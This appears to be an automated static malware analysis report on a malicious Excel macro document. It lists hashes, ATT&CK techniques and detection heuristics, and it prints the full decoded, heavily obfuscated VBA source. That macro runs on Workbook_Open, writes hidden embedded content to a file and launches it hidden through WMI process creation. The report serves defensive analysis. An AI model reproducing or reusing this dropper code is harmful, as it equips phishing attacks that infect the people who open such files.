Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 771325041cb1326e…

MALICIOUS

Office (OOXML) / .XLSX

179.9 KB Created: 2021-03-22 13:11:29 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-07-13
MD5: b9a157c0fd8a38c5b065892987447385 SHA-1: b4ef1891db1bd3d2d48603fea3c9dda252b75815 SHA-256: 771325041cb1326e59838f219a4f4b0493d788b9e32d5404cb0f6e1c99c1408c
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing VBA macros, indicated by the OOXML_VBA and OLE_VBA_WBOPEN heuristics. The Workbook_Open macro is present and uses GetObject, suggesting an attempt to execute code. The obfuscated VBA script likely aims to download and execute a second-stage payload, as suggested by the presence of 'wmic' and 'winmgmts' commands within the document body, which could be used for process execution or information gathering. The VBA code itself is heavily obfuscated, making a precise determination of its actions difficult, but the overall pattern points to a macro-based downloader.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8528 bytes
SHA-256: e870803c423b1dc52bedb7606d493995be398f2d2dca52c4777f9bf4e395670b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
124 of 235 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
DJKIsfM = IsEmpty("pnUrq5V_FnLN3")
IsError (IsObject(sXjVpSv6qX7wX))
lMkHXSTQnOiCg = IsNumeric("DvQ1GTU")
eljv_dniL_UQC.CVaBrkzWTGgYKziQdmUOi
IsNumeric ("NEFxij_KMkINX")
IsMissing (IsObject(MfkqalCIspE))
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG"
Function oGaIrqcmOGNffeylHHAnjz()


HdvnXO = IsDate(IsArray(SDXM4HM))


DAmkNFPZL5B6 = IsArray(IsObject("xhpjXMMLa66"))


IsObject (IsDate(TwCUAI3ZINml))


oGaIrqcmOGNffeylHHAnjz = Range("GQ85")


IsDate ("b0DhM1")


IsEmpty (IsArray(L6qJNn))


DWU4zAWKTvG = IsError("n6OPz1_xbfNWm")


End Function


Function WRAdwjBDRtstP_NI()


IsError (xZTTMtV_TXkFrt)


WRAdwjBDRtstP_NI = Range("FO77")


LcBx46x = IsEmpty(D8PXYnD)


IsArray (IsNumeric(f8AP7ls08p8D))


End Function


Function qTmsJrjdhKOHCkGzt()


IsError (IsArray("DFhQr09_tHkRU"))


qTmsJrjdhKOHCkGzt = Range("EL255")


PROqcbF = IsMissing(IsNumeric(Us6zbft_CWkibO))


IsDate ("lwQnIp4E5Mh")


End Function

Attribute VB_Name = "FpjJLsQxf_dLILsYhexySzHU"
Function QZdKuofowyE_FuKFt()

IsNumeric (jcxU8L)

IsMissing ("DP0t14")

IsEmpty (IsObject(L2txbqeTh6EI))

IsNull (IsArray(FxxcNY0cbrotd))

IsObject ("U7y8rqL")

IsDate (IsEmpty(ALgW76r_4XRXCr))
Slaxri = IsObject(NH7P9Xh)
YQbQCEB_d_wSD = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.oGaIrqcmOGNffeylHHAnjz
IsMissing (IsError(Xend7HMhrasSa))
Sly7Dg = IsDate(IsNumeric(Vx0Syvf))
rT0uqa6KTZEp = IsDate(nC4FvW_W42s4e)
IsError (kmWu9hC)
C0UONe0z02mw = IsMissing(IsObject("kXvNNX1heJS"))
IsArray ("H0qXKl")
QZdKuofowyE_FuKFt = YQbQCEB_d_wSD

GEcTXj1NqK6z = IsError(IsDate(EIzIqky))

IsNull (IsError("RYEQ019"))

IsNull (IsError(J1DXJIHDlglL))

End Function

Function smvaPo_LuHKu()

IsDate ("CITFVW_q8dB81")

IsEmpty (IsObject("SzKLN9y_KY0XO"))

tepEYGZposcdkPmNbGI_g = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.WRAdwjBDRtstP_NI
RUAUJuYnORRoLoCxYnILFGhiyKVKrJk = Range("GV180")
IsNumeric (IsNumeric("A0I3A0"))
IsNull (IsArray(MWVyaHW))
SWyxWOb = IsEmpty("IOqDTd_oJysDg")
IsEmpty (IsMissing(jX3t3Oz4wjy8))
IsMissing (IsNumeric("LQLJUS"))
FDrAHaBVgaDP = IsDate(IsDate(oy9gO7))
IsNull (IsDate("Ns2kR3_25vU90"))
IsError (IsNumeric(RGT37xK))
AHPs_MdBJewdz = NS_hiFrTA_qC.NGsSLbhckovf
smvaPo_LuHKu = RUAUJuYnORRoLoCxYnILFGhiyKVKrJk + AHPs_MdBJewdz + tepEYGZposcdkPmNbGI_g

IsDate (IsNumeric("cU1sVP_EvA0xF"))

TVL3BDy9j2J3 = IsError(UlEOZXXEjHH)

JzOmRIj = IsArray(lLNFUkvmHz8a)

End Function

Function wiBBvpqRh__zSVzPCvaMOL_euRwlS()

ei5AhlU = IsNumeric(N9oJdP_1FeN0t)

EAtnWDm = IsEmpty(ZWyD3N38KGjH0)

WwpdzarMW = ChrW(CLng((122 Xor (-5.59610705596107E-02 * (-1126 + 715#))))) _
 
XcQIyperjgHnYUkLwUrIQB_omKLGX = ChrW(99)
IsNumeric (IsError("ijD17qi"))
pfesCV_ALepDbpRabividywT = Chr(109) _
 
NfDoMCxkrMCUZuNQe_j_nFG_o = Chr(CLng((991 + (7.34645669291339 * -127))))
HOVpVKcU = ChrW(CLng((-187 + (2.91489361702128 * xlDialogUnhide))))
pQoeZlBGfQihYYjv_PGvLhBb_gDDAr = Chr(58)
LBKBBsPyeo_l_RA = ChrW(114)
IsNumeric ("ADEl1Z_auODz")
UivZG_gJBEGJHdYwaOGgrLIgyIX = Chr(105)
hrwSpbWjfYpdejHJWF = Replace("md>96md>96md>96n32_Procemd>96md>96", "md>96", "")
pyDMzuU = Chr(CLng((-579 + ((611 + 146#) - 59#))))
YStLWm_pwNQCIcJkIa = Chr(CLng((Not (-451 + 400#))))
IsError ("B4rpwdX_HWZRQ")
qprMnOaImaaASKco_psyyh_DCZAdxW = Chr(115) _
 
Xc_rxFjUfFKzQVSutZpRDegQ = Chr(CLng(((-610 - -422#) - -304)))
lzeAZmrnqijre = ChrW(105)
wiBBvpqRh__zSVzPCvaMOL_euRwlS = Join(Array(pyDMzuU & Chr(CLng(((-457 + 467#) Xor xlConeColClustered))) & Chr(CLng(((-224 + 299#) Xor xlRangeAutoFormatTable6))) _
  & WwpdzarMW & Chr(CLng((xlHundredMillions + xlDialogDeleteFormat))) & pfesCV_ALepDbpRabividywT & Xc_rxFjUfFKzQVSutZpRDegQ & qprMnOaImaaASKco_psyyh_DCZAdxW & pQoeZlBGfQihYYjv_PGvLhBb_gDDAr & LBKBBsPyeo_l_RA & Chr(111) & ChrW(111) & ChrW(116) & Chr(92) & XcQIyperjgHnYUkLwUrIQB_omKLGX & lzeAZmrnqijre & Chr(109) & Chr(CLng((Not ((-1422 - -405#) + 898#)))) & YStLWm_pwNQCIcJkIa & NfDoMCxkrMCUZuNQe_j_nFG_o & HOVpVKcU & UivZG_gJBEGJHdYwaOGgrLIgyIX & hrwSpbWjfYpdejHJWF & NS_hiFrTA_qC.ucismXXbDEF))

ES9Jxw5 = IsArray("g2x9nPhSDALfu")

IsArray ("xDDaJhJ")

IsDate (AJkGC0uPuo53)

End Function

Function AAZJ_ixgCMsuxTjNw()

ImpFeh = IsObject("R497DO")

J1sk75plhteHI = IsArray(IsError("IXC6EBC0hN4p"))

IsObject ("PhAKdp")
kYByyrE = IsError(IsArray(WL6Lac))
r8oqpu = IsEmpty(RQ8Pjk)
biKccNhwalnlGxfNM = Range("HJ88")
B7eBCvh = IsNull(LhwBMhV_OrvZ2)
IsObject (IsEmpty(P7G4k0aCAeoV))
IsArray (IsNull(JKHgsau_G8TcN))
iYkw7w_sJEieg = IsError(IsEmpty("Lia4J6"))
StbN_CUMr_hw_GeA = Range("HZ247")
IsDate (IsDate("JcadeOl"))
AAZJ_ixgCMsuxTjNw = Join(Array(biKccNhwalnlGxfNM & StbN_CUMr_hw_GeA & mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.qTmsJrjdhKOHCkGzt))

ZkAzC8a = IsArray(IsDate("ZM2NTH_BQyLOt"))

IsNumeric (IsDate(rNK4jhHkh5gtA))

gEfYJ9_6lL00 = IsNumeric(DpwsBGj_wODKg6)

End Function


Attribute VB_Name = "NS_hiFrTA_qC"
Attribute VB_Base = "0{AFF362B7-94F2-42CF-B067-534207BF8B96}{96D0F2CA-F860-4DEC-9DE8-BECD63BA89ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NGsSLbhckovf()


IsDate ("F6pYby")


AnaOUw = IsDate("ajxl5gP")


IsArray (IsError("DDkXCRk"))


NGsSLbhckovf = Range("HL219")


IsObject ("ZWGC9GHh4uh")


IsMissing ("TgRh3c_P0HKI")


ukoKZL = IsNull("FlYibQ_XBoPV")


End Function


Function ucismXXbDEF()


IsEmpty (qfja4Qv)


ucismXXbDEF = Range("BK254")


NNSnK1 = IsNumeric(IsNumeric(iJfHnl))


U2BwNYTi9rjw = IsDate("CGMKpr")


End Function

Attribute VB_Name = "OhfmSJOBIU"
Function NVWNO_yHmgV_pzpAjrdH()

IsNumeric (IsNumeric(cdlovf))

IsNull (IsObject(uLwY8Y2))

IsEmpty (eeHuJ0FjGtwG)

Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_

cYCcBtHuMMa3 = IsEmpty(IsDate("X1SNoOvu44ph"))

IsError (IsDate(ZPfhvq_XuKzFD))

IsObject (IsDate("ORPNAD_f6hXF"))

With NVWNO_yHmgV_pzpAjrdH

.ShowWindow = CLng((xlLeftBrace Or xlEPS))

End With

IsMissing (IsDate("GFeKMJ5"))

IsObject (IsEmpty("Mon3UcjmJ4R"))

Zkk2xJM8PhQ = IsNumeric(IsDate(Rk3VtoQ))

End Function

Attribute VB_Name = "eljv_dniL_UQC"
Function CVaBrkzWTGgYKziQdmUOi()


Dim C_elQEaM_fzlxQyq_OhFNIZo As String


WSKr6F = IsDate("YhIt08")


HNB4JHf = IsDate(IsArray(vF6O4Iu6sUb0u))


C_elQEaM_fzlxQyq_OhFNIZo = Replace(NS_hiFrTA_qC.sUff_NcuIfSGEerZBNFusVgwD.Text, "!s=/Cw^MNCNT", "")


IsArray (IsNumeric("SlO4ppVVpwXq"))


IsArray (IsDate("CkVJYze8wtdl6"))


KmTP5p_g1UknM = IsDate(IsDate("AIxKq9"))


Open Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt For Binary As #CLng((xlSortNormal Xor xlMicrosoftWord))


IsObject ("Zb7lMQK_p9Kul")


IsArray (Z0jRdK8_AK7KK)


Put #CLng((xlParamTypeChar And xlSourceSheet)), , C_elQEaM_fzlxQyq_OhFNIZo


WhN2o5395gTkz = IsArray(IsNumeric(HqmA5Z2pcyHz))


IsDate (CCLt9ujszujl)


Close #CLng((xlStandardSummary Or xlOLELink))


UwZeKb = IsDate(xQSNBhf_x4SgWt)


IsError ("XJdDIl3xanLoD")


hKRA_ZIYZJqlouGJs_zkg_SnH


K0XroISYwM0 = IsDate(IsObject(VEdA3NuczVd))


CWTLADq = IsArray(IsEmpty(Qb1PWJ))


End Function


Function hKRA_ZIYZJqlouGJs_zkg_SnH()


IsArray (Xjk7mWMeGLMp)


IH0bFN1 = IsArray("pfSZrz")


IsArray ("rFlYacu")


With GetObject(FpjJLsQxf_dLILsYhexySzHU.wiBBvpqRh__zSVzPCvaMOL_euRwlS)


.Create FpjJLsQxf_dLILsYhexySzHU.AAZJ_ixgCMsuxTjNw & Chr(34) & Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt & Chr(34), Null, OhfmSJOBIU.NVWNO_yHmgV_pzpAjrdH


End With


IsDate (IsError(NvDXHX_TgpXLG))


IsEmpty (IsDate(QgXXZXK))


PyMe5pq = IsArray(jmfQKpW)


NpFfX58_DjN57s = IsDate(IsDate(S3HIfQR))


End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 58368 bytes
SHA-256: 268a89195c6bb9b45a88d4d673b514818686431e21d91e0e57b2ad65e482e1a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
742 of 1102 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.